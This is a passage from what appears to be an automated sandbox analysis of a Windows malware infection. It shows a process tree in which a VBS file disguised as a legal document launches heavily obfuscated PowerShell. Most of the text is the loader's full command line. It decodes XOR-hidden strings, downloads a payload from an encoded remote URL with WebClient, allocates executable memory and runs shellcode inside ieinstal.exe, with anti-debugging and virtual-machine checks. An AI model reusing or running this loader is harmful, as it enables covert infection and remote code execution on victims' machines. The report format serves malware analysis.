1K0 Cl1 BM0KCD0IFI4B5E4R9K4eD 2S4H0 8U0 E 0P7 4O0E' ;E. ( `$Fe hKrTlN7M)p S`$ASUpPhFe rBo mM1 ;O`$ S pMhsePrZo mV2L G= BIGn c l 1R1S 'A4HDT2S1F1S0I0 DP1UB 0M6M1 9M0L1S4D9 5 4E4 9S3 2M3 A 1 0T1CAR1CDM0 C 0 4H4F7 3 B 1 C 0 7 1TD 0T0F0 4 0RCH4 7 2T0V0A7O1CD 0 C 1pB 0 6A1 9P3OAH0 CA1DB 1RFS0F0S0 A 0ECG1FAS4G7 2B4 0U8O1RBI1BA 0K1S0S8U0W5K3 4T5 3e5T3A2 ES0 CO1CDG2 DV0ACM0 5u0 CM0UEB0S8D1 D 0 CF2GFO0D6H1eB 2UFB1IC 0S7 0PAS1SDL0 0H0H6A0 7 3 9s0D6O0 0 0 7T1 DM0GCI1EBB4 1S4H1 0 F 0S2S1 9 4A9T4HDG3AAE0 6N1RBg0M6 4R9P4ADa2A0 0G4 0 4K0 8T0 7 4U0C4 5S4 9 4 1G2NE 2GD 3 D 4 9f2P9M4D1m3p2T2 0T0S7 1ZDM3 9O1RDA1iB 3S4 4R5 4T9B3A2U2T0O0E7 1BDR3 9S1 D 1 B 3O4S4K5 4 9 3 2 2U0F0O7U1BD 3N9 1BDF1 Bm3S4 4 5 4 9A3U2E2L0G0M7 1 D 3P9 1FDT1 BI3 4 4B5K4M9 3f2 2M0A0T7U1ADT3 9T1MD 1SB 3 4R4 0F4 9 4 1L3 2 2 0D0 7T1VDM3 9 1 DT1 Bm3S4U4C0 4 0 4 0 'a; . (C`$FeBh r lK7H)H C`$MSCpNh eGrKo mB2 ;C`$GSUp h e rOo mP3 c=S WIBnMcTlB1 1S ' 4CDk2h1S1 0 0LD 1NBF0 6 1F9 0K1 4 7I2B0 0 7B1 FM0D6O0S2 0TCK4H1 4HDB3 9B0R8s1TFT0 C 0L2A0 0 1 B 0 2 0DCN0m7O5KAM4B5b4 DJ3GEA0A1E0FCK1JBG0TCR0lFK4e5S4MD 3 9 1SA 1 0H0 AL4G5P5 9C4 5 5A9 4 0S' ;U. (L`$ e hsr lU7 ) R`$ S pThre rPoGm 3K#Y;""";Function Spherom9 { param([String]$Wavel); For($Foreffel=1; $Foreffel -lt $Wavel.Length-1; $Foreffel+=(1+1)){$Incl = $Incl + $Wavel.Substring($Foreffel, 1)}; $Incl;}$Prov0 = Spherom9 'LIFE X ';$Prov1= Spherom9 $Misjoinam;if([IntPtr]::size -eq 8){.$env:systemroot\*ysw*64\*indo*ower*\v1.*\po*ll.exe $Prov1 ;}else{.$Prov0 $Prov1;}"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2540

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Incl11 { param([String]$Wavel); $Lingvi = ''; Write-Host $Lingvi; Write-Host $Lingvi; Write-Host $Lingvi; $Unrefut = New-Object byte[] ($Wavel.Length / 2); For($Foreffel=0; $Foreffel -lt $Wavel.Length; $Foreffel+=2){ $Kommando = $Wavel.Substring($Foreffel, 2); $Unrefut[$Foreffel/2] = [convert]::ToByte($Kommando, 16); $Lastendes160 = ($Unrefut[$Foreffel/2] -bxor 105); $Unrefut[$Foreffel/2] = $Lastendes160; } [String][System.Text.Encoding]::ASCII.GetString($Unrefut);}$Matema0=Incl11 '3A101A1D0C04470D0505';$Matema1=Incl11 '24000A1B061A060F1D473E00075A5B473C071A080F0C27081D001F0C240C1D01060D1A';$Matema2=Incl11 '2E0C1D391B060A280D0D1B0C1A1A';$Matema3=Incl11 '3A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A472108070D050C3B0C0F';$Matema4=Incl11 '1A1D1B00070E';$Matema5=Incl11 '2E0C1D24060D1C050C2108070D050C';$Matema6=Incl11 '3B3D3A190C0A0008052708040C454921000D0C2B103A000E4549391C0B05000A';$Matema7=Incl11 '3B1C071D00040C4549240807080E0C0D';$Matema8=Incl11 '3B0C0F050C0A1D0C0D2D0C050C0E081D0C';$Matema9=Incl11 '2007240C04061B1024060D1C050C';$ehrl0=Incl11 '24102D0C050C0E081D0C3D10190C';$ehrl1=Incl11 '2A05081A1A4549391C0B05000A45493A0C08050C0D454928071A002A05081A1A4549281C1D062A05081A1A';$ehrl2=Incl11 '20071F06020C';$ehrl3=Incl11 '391C0B05000A454921000D0C2B103A000E4549270C1E3A05061D45493F001B1D1C0805';$ehrl4=Incl11 '3F001B1D1C0805280505060A';$ehrl5=Incl11 '071D0D0505';$ehrl6=Incl11 '271D391B061D0C0A1D3F001B1D1C0805240C04061B10';$ehrl7=Incl11 '202C31';$ehrl8=Incl11 '35';$Soro=Incl11 '3C3A2C3B5A5B';$Imman=Incl11 '2A0805053E00070D061E391B060A28';function fkp {Param ($Roman, $Makaronie) ;$Trothed0 =Incl11 '4D2F0C1B0449544941322819192D06040800073453532A1C1B1B0C071D2D0604080007472E0C1D281A1A0C040B05000C1A41404915493E010C1B0C44260B030C0A1D4912494D36472E05060B0805281A1A0C040B05102A080A010C494428070D494D364725060A081D000607473A1905001D414D0C011B05514032445834472C181C08051A414D24081D0C04085940491440472E0C1D3D10190C414D24081D0C04085840';.($ehrl7) $Trothed0;$Trothed5 = Incl11 '4D240005004954494D2F0C1B04472E0C1D240C1D01060D414D24081D0C04085B4549323D10190C3234344929414D24081D0C04085A45494D24081D0C04085D4040';.($ehrl7) $Trothed5;$Trothed1 = Incl11 '1B0C1D1C1B07494D240005004720071F06020C414D071C050545492941323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A472108070D050C3B0C0F3441270C1E44260B030C0A1D493A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A472108070D050C3B0C0F4141270C1E44260B030C0A1D4920071D391D1B404549414D2F0C1B04472E0C1D240C1D01060D414D24081D0C04085C40404720071F06020C414D071C0505454929414D3B060408074040404045494D240802081B0607000C4040';.($ehrl7) $Trothed1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Ilderem,[Parameter(Position = 1)] [Type] $Glasslibe = [Void]);$Trothed2 = Incl11 '4D2A060C05081A1D1B495449322819192D06040800073453532A1C1B1B0C071D2D0604080007472D0C0F00070C2D10070804000A281A1A0C040B05104141270C1E44260B030C0A1D493A101A1D0C04473B0C0F050C0A1D00060747281A1A0C040B05102708040C414D24081D0C04085140404549323A101A1D0C04473B0C0F050C0A1D000607472C04001D47281A1A0C040B05102B1C00050D0C1B280A0A0C1A1A3453533B1C0740472D0C0F00070C2D10070804000A24060D1C050C414D24081D0C04085045494D0F08051A0C40472D0C0F00070C3D10190C414D0C011B055945494D0C011B05584549323A101A1D0C0447241C051D000A081A1D2D0C050C0E081D0C3440';.($ehrl7) $Trothed2;$Trothed3 = Incl11 '4D2A060C05081A1D1B472D0C0F00070C2A06071A1D1B1C0A1D061B414D24081D0C04085F4549323A101A1D0C04473B0C0F050C0A1D000607472A08050500070E2A06071F0C071D0006071A3453533A1D08070D081B0D45494D20050D0C1B0C0440473A0C1D200419050C040C071D081D0006072F05080E1A414D24081D0C04085E40';.($ehrl7) $Trothed3;$Trothed4 = Incl11 '4D2A060C05081A1D1B472D0C0F00070C240C1D01060D414D0C011B055B45494D0C011B055A45494D2E05081A1A05000B0C45494D20050D0C1B0C0440473A0C1D200419050C040C071D081D0006072F05080E1A414D24081D0C04085E40';.($ehrl7) $Trothed4;$Trothed5 = Incl11 '1B0C1D1C1B07494D2A060C05081A1D1B472A1B0C081D0C3D10190C4140';.($ehrl7) $Trothed5 ;}$Indu = Incl11 '020C1B070C055A5B';$Incl03 = Incl11 '2E0C1D2A06071A06050C3E00070D061E';$Incl00=Incl11 '3A01061E3E00070D061E';$Incl01 = Incl11 '4D2B001A1D081D0C005B5D58495449323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A4724081B1A0108053453532E0C1D2D0C050C0E081D0C2F061B2F1C070A1D000607390600071D0C1B41410F0219494D3A061B06494D20070A055959404549412E2D3D4929413220071D391D1B344549323C20071D5A5B344049413220071D391D1B34404040';.($ehrl7) $Incl01;$Incl02 = Incl11 '4D2819081D08495449323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A4724081B1A0108053453532E0C1D2D0C050C0E081D0C2F061B2F1C070A1D000607390600071D0C1B41410F0219494D20070D1C494D20070A05595A404549412E2D3D4929413220071D391D1B344049413220071D391D1B34404040';.($ehrl7) $Incl02;$Trothed7 = Incl11 '4D3D0019064954494D2819081D084720071F06020C415940';.($ehrl7) $Trothed7;$Trothed7 = Incl11 '4D2B001A1D081D0C005B5D584720071F06020C414D3D00190645495940';.($ehrl7) $Trothed7;$Trothed6 = Incl11 '4D00070D0F030C1D495449323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A4724081B1A0108053453532E0C1D2D0C050C0E081D0C2F061B2F1C070A1D000607390600071D0C1B41410F0219494D20070D1C494D0C011B055D404549412E2D3D4929413220071D391D1B344549323C20071D5A5B344549323C20071D5A5B344549323C20071D5A5B344049413220071D391D1B34404040';.($ehrl7) $Trothed6;$Psyc = fkp $ehrl5 $ehrl6;$Trothed7 = Incl11 '4D39081F0C02001B020C075A4954494D00070D0F030C1D4720071F06020C413220071D391D1B345353330C1B0645495F5C5F454959115A595959454959115D5940';.($ehrl7) $Trothed7;$Trothed8 = Incl11 '4D3E010C1B0C0F4954494D00070D0F030C1D4720071F06020C413220071D391D1B345353330C1B0645495B585851515F5951454959115A595959454959115D40';.($ehrl7) $Trothed8;$Incl01 = Incl11 '011D1D191A534646181C000A020A010C0A0211470E001D011C0B47000646181C000A02040C463C0D0E0807471C5A5B';$Incl00 = Incl11 '4D3A19010C1B060449544941270C1E44260B030C0A1D49270C1D473E0C0B2A05000C071D40472D061E070506080D3A1D1B00070E414D20070A05595840';$Trothed8 = Incl11 '4D39081F0C02001B020C075B544D0C071F530819190D081D08';.($ehrl7) $Trothed8;$Pavekirken2=$Pavekirken2+'\Spas.urf';$Spherom='';if (-not(Test-Path $Pavekirken2)) {while ($Spherom -eq '') {.($ehrl7) $Incl00;Start-Sleep 5;}Set-Content $Pavekirken2 $Spherom;}$Spherom = Get-Content $Pavekirken2;$Trothed9 = Incl11 '4D3D1B061D010C0D495449323A101A1D0C04472A06071F0C1B1D3453532F1B06042B081A0C5F5D3A1D1B00070E414D3A19010C1B060440';.($ehrl7) $Trothed9;$Spherom0 = Incl11 '323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A4724081B1A0108053453532A061910414D3D1B061D010C0D4549594549494D39081F0C02001B020C075A45495F5C5F40';.($ehrl7) $Spherom0;$Magn=$Trothed.count-656;$Spherom1 = Incl11 '323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A4724081B1A0108053453532A061910414D3D1B061D010C0D45495F5C5F45494D3E010C1B0C0F45494D24080E0740';.($ehrl7) $Spherom1;$Spherom2 = Incl11 '4D21100D1B061901495449323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A4724081B1A0108053453532E0C1D2D0C050C0E081D0C2F061B2F1C070A1D000607390600071D0C1B41410F0219494D3A061B06494D2004040807404549412E2D3D4929413220071D391D1B3445493220071D391D1B3445493220071D391D1B3445493220071D391D1B3445493220071D391D1B344049413220071D391D1B34404040';.($ehrl7) $Spherom2;$Spherom3 = Incl11 '4D21100D1B0619014720071F06020C414D39081F0C02001B020C075A454D3E010C1B0C0F454D391A100A4559455940';.($ehrl7) $Spherom3#"
3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:2144

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
4⤵
- Checks QEMU agent file
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2528

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\GrigoropoulosLaw-294029 poundage 2023-06-06 .vbs"
1⤵
- Checks computer location settings
PID:392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir
2⤵
PID:2632

C:\Windows\System32\cmd.exe
cmd /c dir&echo ###RSHELL.EXE###
2⤵
PID:3632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Misjoinam = """ FSu nOc tCiPo nR AI nMcFlS1 1 U{P B DpPaMrpaImM(P[aSdtBr i n gM] `$AW aFv eSl )G; `$SLFiVn g vPiF L=K ' 'B;R W r iPtAeF-LHeoIsbtU W`$FL iHnSg vFiL;P WdrAi tPeB-nH oss t U`$ L iKnTg v iI;N CWCr i tKe - HDo sUt E`$SL iAnHgSv i ;M K V S`$SU narTeSfFu t R=U BNHeBwL-oOVbgj ePcstS b yhtbeA[ ] V(f`$BWIa v eBlR. LseRnSgct hS U/M 2o)U; K S P VFno r (P`$SF oBr e fCf eFl =S0 ; C`$uFEo r emfBfAeTlI -Ulst C`$ WFaCv eOl .CL eInbgDtTh ; S`$FFVo r eAf fAe l +t= 2 ) { I S`$PKPo m mAaAnGd o =R `$SW aIv eBlt. SCuAbCsCtSr i nPg (I`$ F oprUe f f e lB,S U2 ) ; A M N O A `$CU nSrFeHfMuStC[ `$uFSoSrMe fSfAeFlF/D2 ] F=E [BcEoPnFvTeOr tA]F:A:ATGoRBRyRtSee( `$BK oCmUm acnOdToH, G1D6 )A;P `$SLCabsCt eMnAdLeBs 1b6 0 =E A( `$SU n r eIfSu t [ `$RF oOrHeFf f eOlN/T2p]S -BbRxPoAr I1 0U5V)R;V S `$LU nir etfWuMtL[C`$ FIo rCeCfSfUeAlO/M2R]t = Z`$RLTa sUt e nud e sg1 6O0 ;n P R S} S[ S t r i nUgR]G[ASUyFsPtUe m . TRe x tF.IEEnScBo dgi nAgX] : :FARSPCAIGI . GUeZtBS tTrDi nogM( `$ U n rSeRfAu tM) ; } `$HM a tIeJm a 0T=sITnAcFlT1E1 'S3SA 1M0C1SA 1 D 0 CA0S4 4 7I0 DW0 5 0H5R'I; `$LMFa tPeGmCaH1 = I nDc lP1 1 S'H2 4J0E0M0 AP1eBA0I6 1RAu0H6S0 FU1FD 4A7 3 EF0S0 0E7S5KA 5 B 4W7L3 Cd0 7 1HA 0N8d0AF 0MCS2 7A0U8R1 D 0 0 1UFP0TCL2U4B0SCD1ADM0U1K0K6 0DDS1PAS'u;v`$SMSa tCe mPa 2w= I nAcPlS1A1S ' 2DET0NCP1CDB3N9 1 B 0 6H0AAT2 8 0JD 0CD 1TBA0 CS1 AS1 AS'B;L`$MMbaTt eamMa 3H=mIAnMcSlL1 1B 'E3BAA1 0 1lA 1SDG0lCL0 4R4 7D3 BB1IC 0 7 1 DA0I0D0V4 0BC 4G7F2 0 0R7 1 DA0 CT1UBB0T6I1P9 3KAO0UC 1 BR1OFW0I0D0sAS0 CS1 A 4V7P2 1O0R8K0G7V0 Da0S5c0TC 3 BP0UCF0NFB'e; `$iM a tEePm aS4P= I nFcDl 1B1J 'u1MAI1 D 1pBD0 0B0 7 0DET'R;F`$UMUaStEeDmRaR5K=SICnmcFl 1W1U ' 2AE 0SCI1NDS2 4R0 6 0OD 1SCB0 5L0 Cb2 1H0e8H0B7D0JD 0 5C0 C ' ;C`$PM aCtNeNm a 6 = IDnmcDlS1U1 ' 3OB 3FD 3 A 1 9A0 CD0sAV0S0A0C8U0N5 2s7U0C8V0V4 0CCS4T5 4F9D2 1I0 0C0uD 0ECD2SBY1 0P3MA 0 0U0 EC4C5 4S9M3i9 1 C 0FB 0g5i0T0 0 A ' ; `$ MGast eTmVa 7 =sI nNcAl 1H1C E'K3SB 1 CK0 7U1 D 0f0J0U4 0BC 4H5T4V9 2A4C0F8 0 7N0 8S0PE 0 CA0SDB'U;P`$FM aTtTeTm aM8N=HI n c l 1 1 ' 3IB 0 CE0VF 0 5L0SCT0 A 1BD 0 CA0BDD2SDM0 CN0D5 0 C 0 EW0F8S1 DE0SCI'S;a`$ M aFtAetm aC9 =KI n c lT1 1H S'K2D0 0S7d2C4 0BC 0T4I0 6O1CBL1M0N2 4P0T6 0FDI1BC 0 5 0OC 'S; `$Ve h rSl 0 =RIFnUc lA1S1 ' 2N4 1 0O2PDA0 C 0B5V0UCT0sEK0T8 1kD 0BC 3 D 1 0L1 9O0 CN' ; `$ eGhOrFlD1U= IsnMcSlS1B1U ' 2aAE0S5B0 8A1IA 1UA 4E5P4 9 3 9S1 CP0 BU0F5 0F0A0CAR4 5 4C9 3BAd0ECM0g8T0 5O0CCO0ADI4U5 4f9 2M8 0K7H1EAU0 0 2JA 0 5A0S8P1 AI1OA 4D5 4 9a2 8 1VCR1 DR0 6T2 A 0S5S0 8B1 AB1 AT' ;C`$ eFh rGlW2K=FI n c lF1T1C F'D2B0 0S7S1KFT0S6G0L2 0 C 'A; `$seAhrr lT3M= IAn cVlW1R1N 'H3 9 1BC 0SB 0A5 0L0B0SAo4C5M4M9 2G1I0P0T0ID 0WCf2 B 1 0S3MAS0S0V0 EC4 5 4 9 2 7F0 CL1KEH3JAm0 5A0I6 1SD 4 5N4 9 3OFP0D0 1 B 1SD 1SC 0 8C0P5d'L;t`$ eShTrBl 4 =DI n c l 1S1 'A3PFZ0K0B1HB 1AD 1UCS0 8 0 5M2E8 0F5 0A5 0B6 0aAB' ; `$PeBhIrBlD5 = I nPc l 1 1 U'F0D7 1GD 0BDt0 5A0 5T'P; `$ e h rFlS6 = I n cRlP1T1 S'G2 7j1cD 3h9S1 BS0 6 1 DI0 Cn0 AE1BD 3VFU0 0B1AB 1SDC1 C 0S8S0 5 2G4R0 CA0D4N0S6G1 BB1 0 ' ;D`$UeUhSr l 7 =FIFn cMl 1B1I ' 2U0 2 CT3L1u'R;F`$SeGh r l 8a=AISn cLl 1S1 ' 3 5S' ; `$ SDo rDoS= I nHcFlU1T1 B' 3rC 3RA 2SCR3CBW5SAA5 BI'Z; `$BI mUmmaSnP=BIEn cAl 1D1A V' 2bA 0 8 0T5T0 5T3 EK0L0F0C7O0 DL0 6 1 E 3 9E1CB 0r6G0UAS2 8S'T; f uLn cPtWi o n OfDkVpF M{uPRaFr a m (S`$ R o mBaUn ,S K`$CMRa k aUrSoCnAiBeD)P S F L C;A`$ETIrUoSt h e dF0R = I n c lN1h1 ' 4GD 2CFV0RCS1AB 0r4Y4G9R5 4S4F9 4V1 3K2G2 8V1B9 1 9P2IDT0A6C0 4G0 8 0D0 0 7H3T4U5 3 5 3S2 A 1 C 1 BF1 BI0aC 0F7 1MD 2vD 0T6H0B4 0L8 0 0A0s7 4N7 2BE 0 C 1fDF2T8S1IAS1MAP0lCT0 4N0CB 0 5H0 0D0dC 1RAr4P1S4 0 4 9 1 5M4F9 3PE 0B1U0UC 1 BH0 CB4 4H2A6s0 Bo0 3K0RC 0LA 1rDP4L9 1 2R4 9 4 DN3 6U4L7B2LEI0O5M0Y6L0BBC0H8 0S5T2U8B1PAK1RAB0sCv0E4A0PB 0R5D1 0M2sA 0S8 0DA 0R1 0FC 4D9 4B4 2P8R0 7E0SDS4A9 4AD 3M6 4M7 2B5a0T6 0 AD0T8N1 DU0C0P0A6M0t7U4 7 3 Af1B9U0 5T0 0M1RDT4 1d4KDr0BC 0A1H1MBs0 5s5V1P4 0 3 2N4D4r5 8A3C4S4 7T2TCs1S8e1RCH0 8 0 5B1 A 4 1L4 DF2B4P0 8P1 D 0 CT0 4 0 8 5K9B4F0T4 9I1 4v4C0H4U7 2 EP0 Cm1 D 3PDP1R0R1B9 0 C 4O1M4JD 2 4E0L8C1BD 0 C 0R4 0o8F5 8 4N0 ' ;V.I(K`$oePh rSl 7 )U S`$ATlrNoPtIhNeBdl0S;S`$ T rLoLt hWeBdu5 P=C kIPnZc l 1L1V ' 4 DO2F4 0M0K0M5 0 0O4L9 5 4 4 9G4GDH2TFM0 CD1 BE0P4 4P7 2 ED0 CA1UD 2L4 0ACG1ED 0 1O0 6 0BDD4 1M4HDN2D4S0S8 1AD 0aCM0S4D0 8P5JB 4V5S4K9t3T2 3FDM1S0 1 9K0PC 3K2 3 4 3G4 4 9N2S9D4M1 4AD 2A4S0 8A1 DS0CC 0 4 0 8 5 Ak4H5r4R9 4DDN2F4A0S8 1ADB0AC 0I4 0B8t5 D 4 0H4K0 ' ;D. ( `$KeGhPr l 7 ) `$STPrno tSh eSd 5I;H`$ TVrMoGtDh e dL1B =K FIBnKcClB1i1 U'B1ABL0TCL1ADR1 C 1SB 0T7P4 9 4BDH2 4S0 0 0E5u0l0 4I7 2S0 0S7E1DFS0C6 0I2C0BC 4F1 4RDP0 7M1SCB0M5D0F5S4 5S4T9 2 9 4S1G3P2 3kAV1M0A1SAC1GDU0cC 0V4 4s7L3 BE1 CP0d7S1KDM0 0P0 4D0WC 4d7M2 0F0 7 1OD 0 CP1 BS0W6T1 9P3WAR0LCA1 BB1GFC0L0D0IA 0 CD1pAO4 7F2A1 0S8 0I7o0 D 0M5 0 C 3BBF0 Cr0AF 3A4m4t1F2F7 0 C 1 E 4O4 2I6 0 BA0G3 0NC 0OAs1 DB4F9T3 AM1 0R1LAP1MDF0LCe0B4B4 7 3ABC1 CS0U7 1SD 0 0T0s4 0 CK4L7b2K0P0G7L1ADU0RCS1TB 0B6K1E9D3MA 0 CH1AB 1FFN0 0J0 A 0GCA1 AB4 7 2 1A0S8D0E7s0 DC0E5E0 CH3 BE0OCK0PF 4 1 4T1B2A7N0FC 1 EH4f4H2P6H0 BD0S3s0BCA0 A 1 DC4U9 2r0a0 7a1TDF3 9F1 D 1 BR4 0R4 5O4R9 4M1r4SDA2IF 0 C 1 B 0 4e4S7 2UET0LC 1PDB2M4S0hC 1 D 0D1R0W6 0iDP4 1p4PDS2 4 0F8R1eD 0HC 0S4 0 8 5 Cg4 0R4 0M4 7E2 0T0 7R1 FD0b6 0T2S0DC 4 1F4PDA0s7 1PCP0U5 0K5 4T5 4 9 2C9G4G1 4FDI3VB 0 6S0U4 0U8U0A7T4 0 4S0 4 0 4 0 4b5G4P9V4 DT2T4l0 8 0 2T0 8 1HBK0 6P0E7 0 0 0FCH4L0 4 0L' ;g.J(U`$ eTh rDlM7 )C p`$GT rMoDtth eAdT1t;L} f uUnHc tAi o nL G D T L{ P aHrSaKm (O[RP aDrcaSm eKtFeDr ( P o s iAt iSoCnH T=l i0B,S MVa n dBa tHo r y T= U`$NT rIume )k]P S[KT yfpGeS[ ] ]F `$ ISlTd e rPe mM,T[FPPaPrsaFmBeJtDe r (SPUoLsRi tSi o nN B= 1 ) ] A[ T yPpCeR] L`$ GAl aCsSs lBi b e =S A[SVSo iFdH]M)L;t`$TTPrCoStLhUe dP2 = DI nVcSl 1 1t f' 4 DH2BAN0 6o0 C 0 5S0 8L1 AD1 DB1EBP4K9P5N4E4 9 3B2S2S8 1P9 1R9A2 DF0T6 0T4H0R8S0 0 0 7 3F4 5 3 5d3 2 AM1BCS1bB 1 BT0 CF0F7 1MD 2HDO0i6V0K4 0S8M0A0P0 7F4 7 2MDB0AC 0SFU0C0I0R7 0DC 2PDI1S0 0 7N0 8m0T4 0D0B0KAP2U8 1dAT1TA 0 CS0A4E0GBC0N5A1H0 4W1 4 1 2B7F0 CF1dEU4 4T2M6F0 Bt0E3 0JCE0 AB1 D 4t9M3 AB1G0U1 A 1 D 0 C 0 4F4R7H3EB 0 CD0FFJ0F5 0SCS0SAF1PD 0U0 0A6O0 7P4 7 2p8K1SAC1BAD0 CS0G4 0 BD0F5S1F0 2P7 0 8r0 4N0FC 4l1 4 D 2V4 0I8C1 D 0BC 0 4S0 8 5N1S4A0M4P0H4 5 4m9N3B2C3TAV1 0G1 AA1GDS0 C 0G4v4G7K3 BA0ACO0EF 0 5 0 CS0FAC1ID 0 0k0U6U0 7 4 7B2 C 0M4 0D0O1 D 4C7D2E8 1 AE1 A 0gC 0 4O0 Bl0K5I1 0R2SBM1FCT0d0W0 5T0QD 0 CS1 B 2P8 0CAM0 AB0 CE1IAR1tA 3N4M5 3O5b3 3MBY1 C 0u7f4U0 4 7 2SD 0ACT0DFF0U0N0 7G0PCS2SDE1E0S0D7 0d8 0 4 0 0P0TAA2S4L0T6T0BD 1RCS0S5S0KCE4F1Q4BD 2C4P0S8D1RDs0ACR0 4k0L8U5I0 4L5S4F9 4SDS0 FH0S8O0S5G1 A 0 CB4 0U4E7D2CDK0 C 0 FU0P0T0d7 0 C 3CDL1W0 1H9 0 C 4G1S4TD 0 CA0F1B1VB 0 5 5T9U4C5P4A9W4 D 0WCK0D1L1 BT0 5B5D8 4B5D4N9F3 2T3CA 1b0 1 A 1SD 0SCQ0 4M4K7A2 4A1 CM0m5 1DD 0M0L0FAD0A8 1 A 1 D 2 DO0 CA0K5P0mC 0UEU0 8 1FDT0 CM3U4O4 0A'F;S.S( `$ReCh rJl 7P) P`$WTHr oWtKhSe d 2S; `$ TorDoUt hLeBdC3C = I nSc lL1 1 R'S4 DP2BA 0S6I0LCL0P5 0F8 1BA 1TD 1 BD4R7L2 D 0CC 0TFV0 0T0 7 0WCA2 AS0M6 0f7O1 AF1OD 1UB 1nC 0FAE1LDB0D6U1HBF4C1e4 D 2 4V0 8p1CD 0PCB0L4 0b8F5SF 4T5 4S9 3T2 3PA 1J0 1SAU1WD 0 CS0S4K4V7 3HB 0aCC0 F 0 5S0 CF0PAE1 D 0C0 0 6 0 7Z4 7 2 A 0 8T0 5A0D5 0 0 0S7G0BET2 AO0P6F0 7M1 F 0CC 0 7T1 DQ0 0R0M6N0M7 1PAf3 4T5C3 5 3K3 A 1 Dm0e8 0 7B0RD 0U8j1 BR0LDP4B5H4B9 4VD 2 0R0 5S0BDM0NCC1 B 0 C 0U4 4S0O4 7D3KAd0BC 1oD 2K0 0D4R1l9 0 5O0ECS0U4 0 CI0 7 1 DD0 8F1AD 0A0D0F6A0O7 2OFT0H5R0 8 0UEF1FA 4 1 4MD 2M4T0S8H1 D 0SC 0 4 0D8 5ME 4s0 ' ; .b(S`$ eNhBr lR7H)P T`$ T r o tChpeBd 3N; `$ T r oTtUhSeAdP4R G= MISn c l 1S1B D'K4EDr2EAb0 6 0 C 0 5i0 8E1RA 1 D 1SBR4 7P2CDB0 C 0PF 0N0A0 7 0TCD2F4 0FC 1 DG0 1 0V6C0VDC4S1B4 D 0 C 0P1H1 Bk0z5 5TB 4B5 4 9 4 D 0 CR0 1R1IBH0J5S5SA 4L5T4T9K4PD 2 EO0 5 0O8R1 AI1 A 0 5 0 0N0AB 0 CP4P5 4U9 4hD 2 0 0 5P0SDA0 CB1aB 0FC 0 4 4P0 4f7o3BAG0 CB1SDA2 0A0 4S1L9 0M5T0ECu0 4S0 C 0 7M1 DM0 8d1dD 0F0T0A6 0 7 2HFS0p5 0G8O0UEB1 AJ4 1A4 DR2 4s0H8F1MD 0NCR0D4 0W8 5DEK4 0 ' ;V. (T`$ReHhRr lL7E) `$ST rHoBt hAe d 4M;P`$CTDrDoFt h e d 5 F= I nDcBlS1 1f K'F1 B 0OC 1AD 1 CE1 B 0J7 4 9U4ND 2 AK0 6 0 Cs0 5 0P8 1sA 1 DP1SB 4H7B2TAS1 BB0 C 0U8M1EDT0 CM3 DV1C0S1T9L0 C 4 1I4 0B' ;C. ( `$Ae hDrLlM7 )D `$ TTrRo t hRePdB5F ;T} `$AI nSd uC N=L FI nScUlM1G1g A'K0 2 0CCC1BBS0G7 0IC 0i5B5LA 5MBM'T;F`$ I nUc lT0S3 M=R I n cfl 1C1P F'B2SEM0HCN1CDS2 AS0T6B0J7B1 AB0 6A0T5D0SC 3 E 0 0 0 7E0 DV0 6C1GE 'H;O`$ I nBcUl 0D0 =yI n cKlB1C1W 'G3SAH0 1 0L6R1 ET3EEH0a0 0O7c0TDF0K6C1DEK'V;S`$DI n cil 0S1S =A IOn cClV1a1E P'G4 D 2NBO0 0F1PAM1FD 0S8 1PDK0RC 0 0 5TB 5 DU5M8P4B9H5L4 4P9k3g2 3SA 1A0B1AAP1 DD0bCE0P4 4O7 3 B 1 CL0H7S1 DN0 0U0R4 0SCT4 7S2 0E0 7O1 D 0 CN1 B 0T6r1 9v3 A 0NCA1MBA1LFA0R0 0BAP0BCS1OAS4L7V2P4 0 8 1DBE1CA 0 1s0S8 0 5 3S4 5N3A5D3S2BEA0 CB1FD 2BDB0 C 0 5 0 CD0FEH0A8M1VDR0VC 2AFA0 6F1FBA2HFF1SCU0L7F0iA 1AD 0F0S0 6 0A7B3 9 0 6 0 0R0C7 1SD 0SCB1 BE4P1 4 1A0 F 0 2G1S9i4F9D4 DF3 AS0L6F1 BF0E6A4R9 4VD 2B0S0I7R0bAD0I5O5 9 5 9 4C0D4 5N4 9 4g1 2HEF2 D 3 DD4 9S2S9C4O1G3U2C2H0T0 7 1CD 3B9 1 D 1 BR3S4 4G5l4S9 3V2 3LCU2S0 0 7 1TD 5GAs5 BP3R4e4U0B4U9l4 1 3 2F2M0 0H7S1HD 3V9 1CDr1 B 3S4B4T0 4 0 4p0R'G; .B( `$ eBh rBlS7 )P P`$ IEnDcSlD0O1S;D`$ I n c lF0L2L T= eI nEcCl 1A1 S'E4LD 2 8 1B9 0 8U1BDR0f8S4 9 5 4 4 9c3F2 3HA 1B0A1KAe1 D 0 CF0k4r4S7C3fBg1HC 0 7 1RDR0 